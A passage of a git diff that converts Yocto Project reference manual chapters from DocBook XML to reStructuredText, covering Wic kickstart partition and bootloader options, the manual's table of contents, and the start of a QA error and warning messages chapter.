+   Future updates will implement more commands and options. If you use
+   anything that is not specifically supported, results can be
+   unpredictable.
+
+This chapter provides a reference on the available kickstart commands.
+The information lists the commands, their syntax, and meanings.
+Kickstart commands are based on the Fedora kickstart versions but with
+modifications to reflect Wic capabilities. You can see the original
+documentation for those commands at the following link:
+http://pykickstart.readthedocs.io/en/latest/kickstart-docs.html
+
+Command: part or partition
+==========================
+
+Either of these commands creates a partition on the system and uses the
+following syntax:
+::
+
+   part [mntpoint] 
+   partition [mntpoint]
+
+If you do not
+provide mntpoint, Wic creates a partition but does not mount it.
+
+The ``mntpoint`` is where the partition is mounted and must be in one of
+the following forms:
+
+-  ``/path``: For example, "/", "/usr", or "/home"
+
+-  ``swap``: The created partition is used as swap space
+
+Specifying a mntpoint causes the partition to automatically be mounted.
+Wic achieves this by adding entries to the filesystem table (fstab)
+during image generation. In order for Wic to generate a valid fstab, you
+must also provide one of the ``--ondrive``, ``--ondisk``, or
+``--use-uuid`` partition options as part of the command.
+
+.. note::
+
+   The mount program must understand the PARTUUID syntax you use with
+   ``--use-uuid`` and non-root *mountpoint*, including swap. The busybox
+   versions of these application are currently excluded.
+
+Here is an example that uses "/" as the mountpoint. The command uses
+``--ondisk`` to force the partition onto the ``sdb`` disk:
+::
+
+      part / --source rootfs --ondisk sdb --fstype=ext3 --label platform --align 1024
+
+Here is a list that describes other supported options you can use with
+the ``part`` and ``partition`` commands:
+
+-  ``--size``: The minimum partition size in MBytes. Specify an
+   integer value such as 500. Do not append the number with "MB". You do
+   not need this option if you use ``--source``.
+
+-  ``--fixed-size``: The exact partition size in MBytes. You cannot
+   specify with ``--size``. An error occurs when assembling the disk
+   image if the partition data is larger than ``--fixed-size``.
+
+-  ``--source``: This option is a Wic-specific option that names the
+   source of the data that populates the partition. The most common
+   value for this option is "rootfs", but you can use any value that
+   maps to a valid source plugin. For information on the source plugins,
+   see the ":ref:`dev-manual/dev-manual-common-tasks:using the wic plugin interface`"
+   section in the Yocto Project Development Tasks Manual.
+
+   If you use ``--source rootfs``, Wic creates a partition as large as
+   needed and fills it with the contents of the root filesystem pointed
+   to by the ``-r`` command-line option or the equivalent rootfs derived
+   from the ``-e`` command-line option. The filesystem type used to
+   create the partition is driven by the value of the ``--fstype``
+   option specified for the partition. See the entry on ``--fstype``
+   that follows for more information.
+
+   If you use ``--source plugin-name``, Wic creates a partition as large
+   as needed and fills it with the contents of the partition that is
+   generated by the specified plugin name using the data pointed to by
+   the ``-r`` command-line option or the equivalent rootfs derived from
+   the ``-e`` command-line option. Exactly what those contents are and
+   filesystem type used are dependent on the given plugin
+   implementation.
+
+   If you do not use the ``--source`` option, the ``wic`` command
+   creates an empty partition. Consequently, you must use the ``--size``
+   option to specify the size of the empty partition.
+
+-  ``--ondisk`` or ``--ondrive``: Forces the partition to be created
+   on a particular disk.
+
+-  ``--fstype``: Sets the file system type for the partition. Valid
+   values are:
+
+   -  ``ext4``
+
+   -  ``ext3``
+
+   -  ``ext2``
+
+   -  ``btrfs``
+
+   -  ``squashfs``
+
+   -  ``swap``
+
+-  ``--fsoptions``: Specifies a free-form string of options to be used
+   when mounting the filesystem. This string is copied into the
+   ``/etc/fstab`` file of the installed system and should be enclosed in
+   quotes. If not specified, the default string is "defaults".
+
+-  ``--label label``: Specifies the label to give to the filesystem to
+   be made on the partition. If the given label is already in use by
+   another filesystem, a new label is created for the partition.
+
+-  ``--active``: Marks the partition as active.
+
+-  ``--align (in KBytes)``: This option is a Wic-specific option that
+   says to start partitions on boundaries given x KBytes.
+
+-  ``--offset (in KBytes)``: This option is a Wic-specific option that
+   says to place a partition at exactly the specified offset. If the
+   partition cannot be placed at the specified offset, the image build
+   will fail.
+
+-  ``--no-table``: This option is a Wic-specific option. Using the
+   option reserves space for the partition and causes it to become
+   populated. However, the partition is not added to the partition
+   table.
+
+-  ``--exclude-path``: This option is a Wic-specific option that
+   excludes the given relative path from the resulting image. This
+   option is only effective with the rootfs source plugin.
+
+-  ``--extra-space``: This option is a Wic-specific option that adds
+   extra space after the space filled by the content of the partition.
+   The final size can exceed the size specified by the ``--size``
+   option. The default value is 10 Mbytes.
+
+-  ``--overhead-factor``: This option is a Wic-specific option that
+   multiplies the size of the partition by the option's value. You must
+   supply a value greater than or equal to "1". The default value is
+   "1.3".
+
+-  ``--part-name``: This option is a Wic-specific option that
+   specifies a name for GPT partitions.
+
+-  ``--part-type``: This option is a Wic-specific option that
+   specifies the partition type globally unique identifier (GUID) for
+   GPT partitions. You can find the list of partition type GUIDs at
+   http://en.wikipedia.org/wiki/GUID_Partition_Table#Partition_type_GUIDs.
+
+-  ``--use-uuid``: This option is a Wic-specific option that causes
+   Wic to generate a random GUID for the partition. The generated
+   identifier is used in the bootloader configuration to specify the
+   root partition.
+
+-  ``--uuid``: This option is a Wic-specific option that specifies the
+   partition UUID.
+
+-  ``--fsuuid``: This option is a Wic-specific option that specifies
+   the filesystem UUID. You can generate or modify
+   :term:`WKS_FILE` with this option if a preconfigured
+   filesystem UUID is added to the kernel command line in the bootloader
+   configuration before you run Wic.
+
+-  ``--system-id``: This option is a Wic-specific option that
+   specifies the partition system ID, which is a one byte long,
+   hexadecimal parameter with or without the 0x prefix.
+
+-  ``--mkfs-extraopts``: This option specifies additional options to
+   pass to the ``mkfs`` utility. Some default options for certain
+   filesystems do not take effect. See Wic's help on kickstart (i.e.
+   ``wic help kickstart``).
+
+Command: bootloader
+===================
+
+This command specifies how the bootloader should be configured and
+supports the following options:
+
+.. note::
+
+   Bootloader functionality and boot partitions are implemented by the
+   various
+   --source
+   plugins that implement bootloader functionality. The bootloader
+   command essentially provides a means of modifying bootloader
+   configuration.
+
+-  ``--timeout``: Specifies the number of seconds before the
+   bootloader times out and boots the default option.
+
+-  ``--append``: Specifies kernel parameters. These parameters will be
+   added to the syslinux ``APPEND`` or ``grub`` kernel command line.
+
+-  ``--configfile``: Specifies a user-defined configuration file for
+   the bootloader. You can provide a full pathname for the file or a
+   file that exists in the ``canned-wks`` folder. This option overrides
+   all other bootloader options.
diff --git a/documentation/ref-manual/ref-kickstart.xml b/documentation/ref-manual/ref-kickstart.xml
deleted file mode 100644
index 1128bd50d0..0000000000
--- a/documentation/ref-manual/ref-kickstart.xml
+++ /dev/null
@@ -1,334 +0,0 @@
-<!DOCTYPE chapter PUBLIC "-//OASIS//DTD DocBook XML V4.2//EN"
-"http://www.oasis-open.org/docbook/xml/4.2/docbookx.dtd"
-[<!ENTITY % poky SYSTEM "../poky.ent"> %poky; ] >
-
-<chapter id='ref-kickstart'>
-<title>OpenEmbedded Kickstart (<filename>.wks</filename>) Reference</title>
-
-    <section id='openembedded-kickstart-wks-reference'>
-        <title>Introduction</title>
-
-        <para>
-            The current Wic implementation supports only the basic kickstart
-            partitioning commands:
-            <filename>partition</filename> (or <filename>part</filename>
-            for short) and <filename>bootloader</filename>.
-            <note>
-                Future updates will implement more commands and options.
-                If you use anything that is not specifically supported, results
-                can be unpredictable.
-            </note>
-        </para>
-
-        <para>
-            This chapter provides a reference on the available kickstart
-            commands.
-            The information lists the commands, their syntax, and meanings.
-            Kickstart commands are based on the Fedora kickstart versions but
-            with modifications to reflect Wic capabilities.
-            You can see the original documentation for those commands at the
-            following link:
-            <literallayout class='monospaced'>
-     <ulink url='http://pykickstart.readthedocs.io/en/latest/kickstart-docs.html'>http://pykickstart.readthedocs.io/en/latest/kickstart-docs.html</ulink>
-            </literallayout>
-        </para>
-    </section>
-
-    <section id='command-part-or-partition'>
-        <title>Command: part or partition</title>
-
-        <para>
-            Either of these commands creates a partition on the system and uses
-            the following syntax:
-            <literallayout class='monospaced'>
-     part [<replaceable>mntpoint</replaceable>]
-     partition [<replaceable>mntpoint</replaceable>]
-            </literallayout>
-            If you do not provide <replaceable>mntpoint</replaceable>, Wic
-            creates a partition but does not mount it.
-        </para>
-
-        <para>
-            The <filename><replaceable>mntpoint</replaceable></filename> is
-            where the partition is mounted and must be in one of the
-            following forms:
-            <itemizedlist>
-                <listitem><para>
-                    <filename>/<replaceable>path</replaceable></filename>:
-                    For example, "/", "/usr", or "/home"
-                    </para></listitem>
-                <listitem><para>
-                    <filename>swap</filename>:
-                    The created partition is used as swap space
-                    </para></listitem>
-            </itemizedlist>
-        </para>
-
-        <para>
-            Specifying a <replaceable>mntpoint</replaceable> causes the
-            partition to automatically be mounted.
-            Wic achieves this by adding entries to the filesystem table (fstab)
-            during image generation.
-            In order for Wic to generate a valid fstab, you must also provide
-            one of the <filename>--ondrive</filename>,
-            <filename>--ondisk</filename>, or
-            <filename>--use-uuid</filename> partition options as part of the
-            command.
-            <note>
-                The mount program must understand the PARTUUID syntax you use
-                with <filename>--use-uuid</filename> and non-root
-                <replaceable>mountpoint</replaceable>, including swap.
-                The busybox versions of these application are currently
-                excluded.
-            </note>
-            Here is an example that uses "/" as the
-            <replaceable>mountpoint</replaceable>.
-            The command uses <filename>--ondisk</filename> to force the
-            partition onto the
-            <filename>sdb</filename> disk:
-            <literallayout class='monospaced'>
-     part / --source rootfs --ondisk sdb --fstype=ext3 --label platform --align 1024
-            </literallayout>
-        </para>
-
-        <para>
-            Here is a list that describes other supported options you can use
-            with the <filename>part</filename> and
-            <filename>partition</filename> commands:
-            <itemizedlist>
-                <listitem><para>
-                    <emphasis><filename>--size</filename>:</emphasis>
-                    The minimum partition size in MBytes.
-                    Specify an integer value such as 500.
-                    Do not append the number with "MB".
-                    You do not need this option if you use
-                    <filename>--source</filename>.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis><filename>--fixed-size</filename>:</emphasis>
-                    The exact partition size in MBytes.
-                    You cannot specify with <filename>--size</filename>.
-                    An error occurs when assembling the disk image if the
-                    partition data is larger than
-                    <filename>--fixed-size</filename>.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis><filename>--source</filename>:</emphasis>
-                    This option is a Wic-specific option that names the source
-                    of the data that populates the partition.
-                    The most common value for this option is "rootfs", but you
-                    can use any value that maps to a valid source plugin.
-                    For information on the source plugins, see the
-                    "<ulink url='&YOCTO_DOCS_DEV_URL;#wic-using-the-wic-plugin-interface'>Using the Wic Plugins Interface</ulink>"
-                    section in the Yocto Project Development Tasks Manual.
-                    </para>
-
-                    <para>If you use <filename>--source rootfs</filename>, Wic
-                    creates a partition as large as needed and fills it with
-                    the contents of the root filesystem pointed to by the
-                    <filename>-r</filename> command-line option or the
-                    equivalent rootfs derived from the <filename>-e</filename>
-                    command-line option.
-                    The filesystem type used to create the partition is driven
-                    by the value of the <filename>--fstype</filename> option
-                    specified for the partition.
-                    See the entry on <filename>--fstype</filename> that follows
-                    for more information.</para>
-
-                    <para>If you use
-                    <filename>--source <replaceable>plugin-name</replaceable></filename>,
-                    Wic creates a partition as large as needed and fills it
-                    with the contents of the partition that is generated by the
-                    specified plugin name using the data pointed to by the
-                    <filename>-r</filename> command-line option or the
-                    equivalent rootfs derived from the <filename>-e</filename>
-                    command-line option.
-                    Exactly what those contents are and filesystem type used are
-                    dependent on the given plugin implementation.
-                    </para>
-
-                    <para>If you do not use the <filename>--source</filename>
-                    option, the <filename>wic</filename> command creates an
-                    empty partition.
-                    Consequently, you must use the <filename>--size</filename>
-                    option to specify the size of the empty partition.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis><filename>--ondisk</filename> or <filename>--ondrive</filename>:</emphasis>
-                    Forces the partition to be created on a particular disk.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis><filename>--fstype</filename>:</emphasis>
-                    Sets the file system type for the partition.
-                    Valid values are:
-                    <itemizedlist>
-                        <listitem><para>
-                            <filename>ext4</filename>
-                            </para></listitem>
-                        <listitem><para>
-                            <filename>ext3</filename>
-                            </para></listitem>
-                        <listitem><para>
-                            <filename>ext2</filename>
-                            </para></listitem>
-                        <listitem><para>
-                            <filename>btrfs</filename>
-                            </para></listitem>
-                        <listitem><para>
-                            <filename>squashfs</filename>
-                            </para></listitem>
-                        <listitem><para>
-                            <filename>swap</filename>
-                            </para></listitem>
-                    </itemizedlist>
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis><filename>--fsoptions</filename>:</emphasis>
-                    Specifies a free-form string of options to be used when
-                    mounting the filesystem.
-                    This string is copied into the
-                    <filename>/etc/fstab</filename> file of the installed
-                    system and should be enclosed in quotes.
-                    If not specified, the default string is "defaults".
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis><filename>--label label</filename>:</emphasis>
-                    Specifies the label to give to the filesystem to be made on
-                    the partition.
-                    If the given label is already in use by another filesystem,
-                    a new label is created for the partition.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis><filename>--active</filename>:</emphasis>
-                    Marks the partition as active.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis><filename>--align (in KBytes)</filename>:</emphasis>
-                    This option is a Wic-specific option that says to start
-                    partitions on boundaries given
-                    <replaceable>x</replaceable> KBytes.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis><filename>--no-table</filename>:</emphasis>
-                    This option is a Wic-specific option.
-                    Using the option reserves space for the partition and
-                    causes it to become populated.
-                    However, the partition is not added to the partition table.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis><filename>--exclude-path</filename>:</emphasis>
-                    This option is a Wic-specific option that excludes the given
-                    relative path from the resulting image.
-                    This option is only effective with the rootfs source
-                    plugin.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis><filename>--extra-space</filename>:</emphasis>
-                    This option is a Wic-specific option that adds extra space
-                    after the space filled by the content of the partition.
-                    The final size can exceed the size specified by the
-                    <filename>--size</filename> option.
-                    The default value is 10 Mbytes.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis><filename>--overhead-factor</filename>:</emphasis>
-                    This option is a Wic-specific option that multiplies the
-                    size of the partition by the option's value.
-                    You must supply a value greater than or equal to "1".
-                    The default value is "1.3".
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis><filename>--part-name</filename>:</emphasis>
-                    This option is a Wic-specific option that specifies a name
-                    for GPT partitions.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis><filename>--part-type</filename>:</emphasis>
-                    This option is a Wic-specific option that specifies the
-                    partition type globally unique identifier (GUID) for GPT
-                    partitions.
-                    You can find the list of partition type GUIDs at
-                    <ulink url='http://en.wikipedia.org/wiki/GUID_Partition_Table#Partition_type_GUIDs'></ulink>.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis><filename>--use-uuid</filename>:</emphasis>
-                    This option is a Wic-specific option that causes Wic to
-                    generate a random GUID for the partition.
-                    The generated identifier is used in the bootloader
-                    configuration to specify the root partition.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis><filename>--uuid</filename>:</emphasis>
-                    This option is a Wic-specific option that specifies the
-                    partition UUID.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis><filename>--fsuuid</filename>:</emphasis>
-                    This option is a Wic-specific option that specifies the
-                    filesystem UUID.
-                    You can generate or modify
-                    <link linkend='var-WKS_FILE'><filename>WKS_FILE</filename></link>
-                    with this option if a preconfigured filesystem UUID is
-                    added to the kernel command line in the bootloader
-                    configuration before you run Wic.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis><filename>--system-id</filename>:</emphasis>
-                    This option is a Wic-specific option that specifies the
-                    partition system ID, which is a one byte long, hexadecimal
-                    parameter with or without the 0x prefix.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis><filename>--mkfs-extraopts</filename>:</emphasis>
-                    This option specifies additional options to pass to the
-                    <filename>mkfs</filename> utility.
-                    Some default options for certain filesystems do not take
-                    effect.
-                    See Wic's help on kickstart
-                    (i.e. <filename>wic help kickstart</filename>).
-                    </para></listitem>
-            </itemizedlist>
-        </para>
-    </section>
-
-    <section id='command-bootloader'>
-    <title>Command: bootloader</title>
-
-        <para>
-            This command specifies how the bootloader should be configured and
-            supports the following options:
-            <note>
-                Bootloader functionality and boot partitions are implemented by
-                the various <filename>--source</filename> plugins that
-                implement bootloader functionality.
-                The bootloader command essentially provides a means of
-                modifying bootloader configuration.
-            </note>
-            <itemizedlist>
-                <listitem><para>
-                    <emphasis><filename>--timeout</filename>:</emphasis>
-                    Specifies the number of seconds before the bootloader times
-                    out and boots the default option.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis><filename>--append</filename>:</emphasis>
-                    Specifies kernel parameters.
-                    These parameters will be added to the syslinux
-                    <filename>APPEND</filename> or <filename>grub</filename>
-                    kernel command line.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis><filename>--configfile</filename>:</emphasis>
-                    Specifies a user-defined configuration file for the
-                    bootloader.
-                    You can provide a full pathname for the file or a file that
-                    exists in the <filename>canned-wks</filename> folder.
-                    This option overrides all other bootloader options.
-                    </para></listitem>
-            </itemizedlist>
-        </para>
-    </section>
-</chapter>
-<!--
-vim: expandtab tw=80 ts=4
--->
diff --git a/documentation/ref-manual/ref-manual-customization.xsl b/documentation/ref-manual/ref-manual-customization.xsl
deleted file mode 100644
index c58dd905b9..0000000000
--- a/documentation/ref-manual/ref-manual-customization.xsl
+++ /dev/null
@@ -1,29 +0,0 @@
-<?xml version='1.0'?>
-<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns="http://www.w3.org/1999/xhtml" xmlns:fo="http://www.w3.org/1999/XSL/Format" version="1.0">
-
-  <xsl:import href="http://downloads.yoctoproject.org/mirror/docbook-mirror/docbook-xsl-1.76.1/xhtml/docbook.xsl" />
-
-<!--
-
-  <xsl:import href="../template/1.76.1/docbook-xsl-1.76.1/xhtml/docbook.xsl" />
-
-  <xsl:import href="http://docbook.sourceforge.net/release/xsl/1.76.1/xhtml/docbook.xsl" />
-
--->
-
-  <xsl:include href="../template/permalinks.xsl"/>
-  <xsl:include href="../template/section.title.xsl"/>
-  <xsl:include href="../template/component.title.xsl"/>
-  <xsl:include href="../template/division.title.xsl"/>
-  <xsl:include href="../template/formal.object.heading.xsl"/>
-  <xsl:include href="../template/gloss-permalinks.xsl"/>
-  <xsl:include href="../template/qa-code-permalinks.xsl"/>
-
-  <xsl:param name="html.stylesheet" select="'ref-style.css'" />
-  <xsl:param name="chapter.autolabel" select="1" />
-  <xsl:param name="appendix.autolabel" select="A" />
-  <xsl:param name="section.autolabel" select="1" />
-  <xsl:param name="section.label.includes.component.label" select="1" />
-  <xsl:param name="generate.id.attributes" select="1" />
-
-</xsl:stylesheet>
diff --git a/documentation/ref-manual/ref-manual.rst b/documentation/ref-manual/ref-manual.rst
new file mode 100644
index 0000000000..033f4ba28c
--- /dev/null
+++ b/documentation/ref-manual/ref-manual.rst
@@ -0,0 +1,31 @@
+.. SPDX-License-Identifier: CC-BY-SA-2.0-UK
+
+==============================
+Yocto Project Reference Manual
+==============================
+
+|
+
+.. toctree::
+   :caption: Table of Contents
+   :numbered:
+
+   ref-system-requirements
+   ref-terms
+   ref-release-process
+   migration
+   ref-structure
+   ref-classes
+   ref-tasks
+   ref-devtool-reference
+   ref-kickstart
+   ref-qa-checks
+   ref-images
+   ref-features
+   ref-variables
+   ref-varlocality
+   faq
+   resources
+   history
+
+.. include:: /boilerplate.rst
diff --git a/documentation/ref-manual/ref-manual.xml b/documentation/ref-manual/ref-manual.xml
deleted file mode 100755
index 1b82a41a7d..0000000000
--- a/documentation/ref-manual/ref-manual.xml
+++ /dev/null
@@ -1,252 +0,0 @@
-<!DOCTYPE book PUBLIC "-//OASIS//DTD DocBook XML V4.2//EN"
-"http://www.oasis-open.org/docbook/xml/4.2/docbookx.dtd"
-[<!ENTITY % poky SYSTEM "../poky.ent"> %poky; ] >
-
-<book id='ref-manual' lang='en'
-      xmlns:xi="http://www.w3.org/2003/XInclude"
-      xmlns="http://docbook.org/ns/docbook"
-      >
-    <bookinfo>
-
-        <mediaobject>
-            <imageobject>
-                <imagedata fileref='figures/poky-title.png'
-                    format='SVG'
-                    align='left' scalefit='1' width='100%'/>
-            </imageobject>
-        </mediaobject>
-
-        <title>
-            Yocto Project Reference Manual
-        </title>
-
-        <authorgroup>
-            <author>
-                <affiliation>
-                    <orgname>&ORGNAME;</orgname>
-                </affiliation>
-                <email>&ORGEMAIL;</email>
-            </author>
-
-        </authorgroup>
-
-        <revhistory>
-            <revision>
-                <revnumber>4.0+git</revnumber>
-                <date>November 2010</date>
-                <revremark>The initial document released with the Yocto Project 0.9 Release</revremark>
-            </revision>
-            <revision>
-                <revnumber>1.0</revnumber>
-                <date>April 2011</date>
-                <revremark>Released with the Yocto Project 1.0 Release.</revremark>
-            </revision>
-            <revision>
-                <revnumber>1.1</revnumber>
-                <date>October 2011</date>
-                <revremark>Released with the Yocto Project 1.1 Release.</revremark>
-            </revision>
-            <revision>
-                <revnumber>1.2</revnumber>
-                <date>April 2012</date>
-                <revremark>Released with the Yocto Project 1.2 Release.</revremark>
-            </revision>
-            <revision>
-                <revnumber>1.3</revnumber>
-                <date>October 2012</date>
-                <revremark>Released with the Yocto Project 1.3 Release.</revremark>
-            </revision>
-            <revision>
-                <revnumber>1.4</revnumber>
-                <date>April 2013</date>
-                <revremark>Released with the Yocto Project 1.4 Release.</revremark>
-            </revision>
-            <revision>
-                <revnumber>1.5</revnumber>
-                <date>October 2013</date>
-                <revremark>Released with the Yocto Project 1.5 Release.</revremark>
-            </revision>
-            <revision>
-                <revnumber>1.6</revnumber>
-                <date>April 2014</date>
-                <revremark>Released with the Yocto Project 1.6 Release.</revremark>
-            </revision>
-            <revision>
-                <revnumber>1.7</revnumber>
-                <date>October 2014</date>
-                <revremark>Released with the Yocto Project 1.7 Release.</revremark>
-            </revision>
-            <revision>
-                <revnumber>1.8</revnumber>
-                <date>April 2015</date>
-                <revremark>Released with the Yocto Project 1.8 Release.</revremark>
-            </revision>
-            <revision>
-                <revnumber>2.0</revnumber>
-                <date>October 2015</date>
-                <revremark>Released with the Yocto Project 2.0 Release.</revremark>
-            </revision>
-            <revision>
-                <revnumber>2.1</revnumber>
-                <date>April 2016</date>
-                <revremark>Released with the Yocto Project 2.1 Release.</revremark>
-            </revision>
-            <revision>
-                <revnumber>2.2</revnumber>
-                <date>October 2016</date>
-                <revremark>Released with the Yocto Project 2.2 Release.</revremark>
-            </revision>
-            <revision>
-                <revnumber>2.3</revnumber>
-                <date>May 2017</date>
-                <revremark>Released with the Yocto Project 2.3 Release.</revremark>
-            </revision>
-            <revision>
-                <revnumber>2.4</revnumber>
-                <date>October 2017</date>
-                <revremark>Released with the Yocto Project 2.4 Release.</revremark>
-            </revision>
-            <revision>
-                <revnumber>2.5</revnumber>
-                <date>May 2018</date>
-                <revremark>Released with the Yocto Project 2.5 Release.</revremark>
-            </revision>
-            <revision>
-                <revnumber>2.6</revnumber>
-                <date>November 2018</date>
-                <revremark>Released with the Yocto Project 2.6 Release.</revremark>
-            </revision>
-            <revision>
-                <revnumber>2.7</revnumber>
-                <date>May 2019</date>
-                <revremark>Released with the Yocto Project 2.7 Release.</revremark>
-            </revision>
-            <revision>
-                <revnumber>3.0</revnumber>
-                <date>October 2019</date>
-                <revremark>Released with the Yocto Project 3.0 Release.</revremark>
-            </revision>
-            <revision>
-                <revnumber>3.1</revnumber>
-                <date>April 2020</date>
-                <revremark>Released with the Yocto Project 3.1 Release.</revremark>
-            </revision>
-            <revision>
-                <revnumber>3.1.1</revnumber>
-                <date>June 2020</date>
-                <revremark>Released with the Yocto Project 3.1.1 Release.</revremark>
-            </revision>
-            <revision>
-                <revnumber>3.1.2</revnumber>
-                <date>August 2020</date>
-                <revremark>Released with the Yocto Project 3.1.2 Release.</revremark>
-            </revision>
-            <revision>
-                <revnumber>3.1.3</revnumber>
-                <date>October 2020</date>
-                <revremark>Released with the Yocto Project 3.1.3 Release.</revremark>
-            </revision>
-            <revision>
-                <revnumber>3.1.4</revnumber>
-                <date>&REL_MONTH_YEAR;</date>
-                <revremark>Released with the Yocto Project 3.1.4 Release.</revremark>
-            </revision>
-        </revhistory>
-
-    <copyright>
-      <year>&COPYRIGHT_YEAR;</year>
-      <holder>Linux Foundation</holder>
-    </copyright>
-
-    <legalnotice>
-      <para>
-        Permission is granted to copy, distribute and/or modify this document under
-        the terms of the <ulink type="http" url="http://creativecommons.org/licenses/by-sa/2.0/uk/">Creative Commons Attribution-Share Alike 2.0 UK: England &amp; Wales</ulink> as published by Creative Commons.
-      </para>
-           <note><title>Manual Notes</title>
-               <itemizedlist>
-                   <listitem><para>
-                       This version of the
-                       <emphasis>Yocto Project Reference Manual</emphasis>
-                       is for the &YOCTO_DOC_VERSION; release of the
-                       Yocto Project.
-                       To be sure you have the latest version of the manual
-                       for this release, go to the
-                       <ulink url='&YOCTO_DOCS_URL;'>Yocto Project documentation page</ulink>
-                       and select the manual from that site.
-                       Manuals from the site are more up-to-date than manuals
-                       derived from the Yocto Project released TAR files.
-                       </para></listitem>
-                   <listitem><para>
-                       If you located this manual through a web search, the
-                       version of the manual might not be the one you want
-                       (e.g. the search might have returned a manual much
-                       older than the Yocto Project version with which you
-                       are working).
-                       You can see all Yocto Project major releases by
-                       visiting the
-                       <ulink url='&YOCTO_WIKI_URL;/wiki/Releases'>Releases</ulink>
-                       page.
-                       If you need a version of this manual for a different
-                       Yocto Project release, visit the
-                       <ulink url='&YOCTO_DOCS_URL;'>Yocto Project documentation page</ulink>
-                       and select the manual set by using the
-                       "ACTIVE RELEASES DOCUMENTATION" or "DOCUMENTS ARCHIVE"
-                       pull-down menus.
-                       </para></listitem>
-                   <listitem>
-                       <para>
-                       To report any inaccuracies or problems with this
-                       (or any other Yocto Project) manual, send an email to
-                       the Yocto Project documentation mailing list at
-                       <filename>docs@lists.yoctoproject.org</filename> or
-                       log into the freenode <filename>#yocto</filename> channel.
-                       </para>
-                   </listitem>
-               </itemizedlist>
-           </note>
-    </legalnotice>
-
-    </bookinfo>
-
-    <xi:include href="ref-system-requirements.xml"/>
-
-    <xi:include href="ref-terms.xml"/>
-
-    <xi:include href="ref-release-process.xml"/>
-
-    <xi:include href="migration.xml"/>
-
-    <xi:include href="ref-structure.xml"/>
-
-    <xi:include href="ref-classes.xml"/>
-
-    <xi:include href="ref-tasks.xml"/>
-
-    <xi:include href="ref-devtool-reference.xml"/>
-
-    <xi:include href="ref-kickstart.xml"/>
-
-    <xi:include href="ref-qa-checks.xml"/>
-
-    <xi:include href="ref-images.xml"/>
-
-    <xi:include href="ref-features.xml"/>
-
-    <xi:include href="ref-variables.xml"/>
-
-    <xi:include href="ref-varlocality.xml"/>
-
-    <xi:include href="faq.xml"/>
-
-    <xi:include href="resources.xml"/>
-
-<!--    <index id='index'>
-      <title>Index</title>
-    </index>
--->
-
-</book>
-<!--
-vim: expandtab tw=80 ts=4
--->
diff --git a/documentation/ref-manual/ref-qa-checks.rst b/documentation/ref-manual/ref-qa-checks.rst
new file mode 100644
index 0000000000..228b4fd538
--- /dev/null
+++ b/documentation/ref-manual/ref-qa-checks.rst
@@ -0,0 +1,568 @@
+.. SPDX-License-Identifier: CC-BY-SA-2.0-UK
+
+*****************************
+QA Error and Warning Messages
+*****************************
+
+.. _qa-introduction:
+
+Introduction
+============
+
+When building a recipe, the OpenEmbedded build system performs various
+QA checks on the output to ensure that common issues are detected and
+reported. Sometimes when you create a new recipe to build new software,
+it will build with no problems. When this is not the case, or when you
+have QA issues building any software, it could take a little time to
+resolve them.
+
+While it is tempting to ignore a QA message or even to disable QA
+checks, it is best to try and resolve any reported QA issues. This
+chapter provides a list of the QA messages and brief explanations of the
+issues you could encounter so that you can properly resolve problems.
+
+The next section provides a list of all QA error and warning messages
+based on a default configuration. Each entry provides the message or
+error form along with an explanation.
+
+.. note::
+
+   -  At the end of each message, the name of the associated QA test (as
+      listed in the ":ref:`insane.bbclass <ref-classes-insane>`"
+      section) appears within square brackets.
+
+   -  As mentioned, this list of error and warning messages is for QA
+      checks only. The list does not cover all possible build errors or
+      warnings you could encounter.
+
+   -  Because some QA checks are disabled by default, this list does not
+      include all possible QA check errors and warnings.
+
+.. _qa-errors-and-warnings:
+
+Errors and Warnings
+===================
+
+.. _qa-check-libexec:
+
+-  ``<packagename>: <path> is using libexec please relocate to <libexecdir> [libexec]``
+
+   The specified package contains files in ``/usr/libexec`` when the
+   distro configuration uses a different path for ``<libexecdir>`` By
+   default, ``<libexecdir>`` is ``$prefix/libexec``. However, this
+   default can be changed (e.g. ``${libdir}``).
+
+    
+.. _qa-check-rpaths:
+
+-  ``package <packagename> contains bad RPATH <rpath> in file <file> [rpaths]``
+
+   The specified binary produced by the recipe contains dynamic library
+   load paths (rpaths) that contain build system paths such as
+   :term:`TMPDIR`, which are incorrect for the target and
+   could potentially be a security issue. Check for bad ``-rpath``
+   options being passed to the linker in your
+   :ref:`ref-tasks-compile` log. Depending on the build
+   system used by the software being built, there might be a configure
+   option to disable rpath usage completely within the build of the
+   software.
+
+    
+.. _qa-check-useless-rpaths:
+
+-  ``<packagename>: <file> contains probably-redundant RPATH <rpath> [useless-rpaths]``
+
+   The specified binary produced by the recipe contains dynamic library
+   load paths (rpaths) that on a standard system are searched by default
+   by the linker (e.g. ``/lib`` and ``/usr/lib``). While these paths
+   will not cause any breakage, they do waste space and are unnecessary.
+   Depending on the build system used by the software being built, there
+   might be a configure option to disable rpath usage completely within
+   the build of the software.
+
+    
+.. _qa-check-file-rdeps:
+
+-  ``<packagename> requires <files>, but no providers in its RDEPENDS [file-rdeps]``
+
+   A file-level dependency has been identified from the specified
+   package on the specified files, but there is no explicit
+   corresponding entry in :term:`RDEPENDS`. If
+   particular files are required at runtime then ``RDEPENDS`` should be
+   declared in the recipe to ensure the packages providing them are
+   built.
+
+    
+.. _qa-check-build-deps:
+
+-  ``<packagename1> rdepends on <packagename2>, but it isn't a build dependency? [build-deps]``
+
+   A runtime dependency exists between the two specified packages, but
+   there is nothing explicit within the recipe to enable the
